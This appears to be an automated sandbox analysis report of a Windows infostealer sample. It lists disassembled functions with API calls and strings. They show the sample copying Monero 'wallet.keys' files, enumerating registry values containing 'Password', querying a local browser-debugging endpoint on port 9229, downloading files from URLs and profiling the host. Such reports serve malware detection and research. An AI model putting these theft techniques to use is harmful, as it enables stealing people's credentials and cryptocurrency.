                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e0864b428aff0390250e600f6262608d7aea06c8d30fa52ca325231059ef0785
                            • Instruction ID: 186a3da68dc109e10e7f0f21d22bc01161e2fd80f4c754d24db55fe372dfcd64
                            • Opcode Fuzzy Hash: e0864b428aff0390250e600f6262608d7aea06c8d30fa52ca325231059ef0785
                            • Instruction Fuzzy Hash: 427188B6900208ABDB14EBB0DD45FDE73BDAB88301F0459A8F515B7185EB74DB88CB51
                            Function 00E41310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                              • Part of subcall function 00E412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                              • Part of subcall function 00E412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                              • Part of subcall function 00E412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                              • Part of subcall function 00E412A0: RegCloseKey.ADVAPI32(?), ref: 00E412FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4134F
                            • lstrlen.KERNEL32(?), ref: 00E4135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00E41377
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E41465
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 00E414EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 366fb456f24b59e6c25bfe5e75fed70538edb8c4d56dc819d5d66b4a5a77605c
                            • Instruction ID: ae146e993af1f7767d9ebcec3576eaf4aaeb0f6a230a06d73678ca07c797c46e
                            • Opcode Fuzzy Hash: 366fb456f24b59e6c25bfe5e75fed70538edb8c4d56dc819d5d66b4a5a77605c
                            • Instruction Fuzzy Hash: DE5154B1D5011857CB54FB60DDA2FEDB37C9B54301F445AE8B60A72082EE706B89CFA6
                            Function 00E49A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(00E60AF6,00000001,00000000,00000000,00000000), ref: 00E49A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E49AAB
                            • InternetCloseHandle.WININET(00000000), ref: 00E49AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            • Opcode ID: 5338b0fbc0e237bc090c60c05c7ec7f8adb65369e1b4eb68a5a0f9519423cf4e
                            • Instruction ID: 343142b1f7e9bbf6b83e528f3984a68f8a17a703ebb2fa081f65a2b768989498
                            • Opcode Fuzzy Hash: 5338b0fbc0e237bc090c60c05c7ec7f8adb65369e1b4eb68a5a0f9519423cf4e
                            • Instruction Fuzzy Hash: 57414E35A50218ABDB14EF90ED95FDEB7B5EB48780F105198F505B7190CBB0AE84CB64
                            Function 00E47630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E47330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4739A
                              • Part of subcall function 00E47330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E47411
                              • Part of subcall function 00E47330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4746D
                              • Part of subcall function 00E47330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E474B2
                              • Part of subcall function 00E47330: HeapFree.KERNEL32(00000000), ref: 00E474B9
                            • lstrcat.KERNEL32(00000000,00E6192C), ref: 00E47666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E476A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 00E476BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E476EF
                            • lstrcat.KERNEL32(00000000,00E61934), ref: 00E47700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E47733
                            • lstrcat.KERNEL32(00000000,00E61938), ref: 00E4774D
                            • task.LIBCPMTD ref: 00E4775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 84e6fb4bd9b19be484cd91872219333dd74960f2bf4f82a5169b6bfeda2a349f
                            • Instruction ID: 6f554463229e63d89f588b460677462801d6ff2d317b4146816897fd3d3ff6d7
                            • Opcode Fuzzy Hash: 84e6fb4bd9b19be484cd91872219333dd74960f2bf4f82a5169b6bfeda2a349f
                            • Instruction Fuzzy Hash: 5F3181B5940204DBDB18EBA0EE95DFEB3B9AB54301F505129F112B33D4CB34A986CB90
                            Function 00E58290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009CECB0,00000000,?,00E60E14,00000000,?,00000000), ref: 00E582C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E582C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E582E8
                            • __aulldiv.LIBCMT ref: 00E58302
                            • __aulldiv.LIBCMT ref: 00E58310
                            • wsprintfA.USER32 ref: 00E5833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 48b469b183f8ebce5317ca3a16158d3a9cf078e210be76078b574216bc0e15ab
                            • Instruction ID: f4f7113f6a8a1cef747c4badcdc79f024386c02cdd6ac4cee09afe41fb644fd7
                            • Opcode Fuzzy Hash: 48b469b183f8ebce5317ca3a16158d3a9cf078e210be76078b574216bc0e15ab
                            • Instruction Fuzzy Hash: C02127B1E44218ABDB14DFD4CD4AFAEB7B8EB44B01F104A19F615BB280C77859048BA5
                            Function 00E460F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                            • InternetOpenA.WININET(00E60DFB,00000001,00000000,00000000,00000000), ref: 00E4615F
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E461DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E46203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00E4622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E4625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00E46299
                            • InternetCloseHandle.WININET(?), ref: 00E462A3
                            • InternetCloseHandle.WININET(00000000), ref: 00E462B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: e7fb3f9f1016d322c9559b1b975003322de263deb4623b7eea3569907fd6d6ba
                            • Instruction ID: 3c1a82a00e51347cf4fc3377ef617a97f3a61de259e19829fed292423bd6b100
                            • Opcode Fuzzy Hash: e7fb3f9f1016d322c9559b1b975003322de263deb4623b7eea3569907fd6d6ba
                            • Instruction Fuzzy Hash: D451A6B1A40218ABDF24DF90DD45FEEB779AB04305F0045A8F605B72C0DBB46A89CF95
                            Function 00EC012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00EC024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 00EC035B
                            • CatchIt.LIBVCRUNTIME ref: 00EC03AC
                            • CallUnexpected.LIBVCRUNTIME ref: 00EC04C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction ID: eeb08edfdda1bd2b9cae34c0fd64444e2459e2b52aa96c2d7c7c0f4e13306efa
                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction Fuzzy Hash: 90B16931800209DFCF19DFA4DA85EAFBBB5BF04318B14615EE9257B212D332DA52CB91
                            Function 00E47330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E47411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E474B2
                            • HeapFree.KERNEL32(00000000), ref: 00E474B9
                            • task.LIBCPMTD ref: 00E475B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: a170dac7fb8395010860ede6d672e71b4c772cef3adfb5ce1f04eb843716deac
                            • Instruction ID: 9f9ec7dbbc84dbc50872f6223d402a0eba6160ce825d32156d605196b9092673
                            • Opcode Fuzzy Hash: a170dac7fb8395010860ede6d672e71b4c772cef3adfb5ce1f04eb843716deac
                            • Instruction Fuzzy Hash: 51612BB19041689BDB24DB50DD41BEAB3B8BF44304F0095E9E689B6241EFB06FC9CF90
                            Function 00E578B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E578C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E578CB
                            • RegOpenKeyExA.ADVAPI32(80000002,009BC8F8,00000000,00020119,Ix), ref: 00E578EB
                            • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E5790A
                            • RegCloseKey.ADVAPI32(Ix), ref: 00E57914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber$Ix
                            • API String ID: 3225020163-4041952297
